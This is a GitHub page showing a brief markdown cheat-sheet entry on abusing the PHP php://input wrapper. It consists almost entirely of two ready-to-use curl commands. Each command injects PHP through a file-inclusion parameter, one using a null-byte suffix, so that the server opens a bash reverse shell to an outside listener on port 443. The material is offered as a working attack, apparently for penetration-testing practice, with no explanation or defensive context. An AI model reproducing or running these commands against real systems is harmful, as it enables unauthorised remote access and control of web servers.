Skip to content

Latest commit

 

History

History
12 lines (7 loc) · 369 Bytes

Wrapper.md

File metadata and controls

12 lines (7 loc) · 369 Bytes

Wrapper

PHP Wrapper

Reverse shell using

curl -s --data "<? shell_exec('bash -i >& /dev/tcp/192.168.119.194/443 0>&1') ?>" "http://10.0.0.1/internal/advanced_comment_system/admin.php?ACS_path=php://input%00"  

curl -s --data '<?php shell_exec("bash -i >& /dev/tcp/192.168.119.194/443 0>&1 2>&1"); ?>' http://10.0.0.1/section.php?page=php://input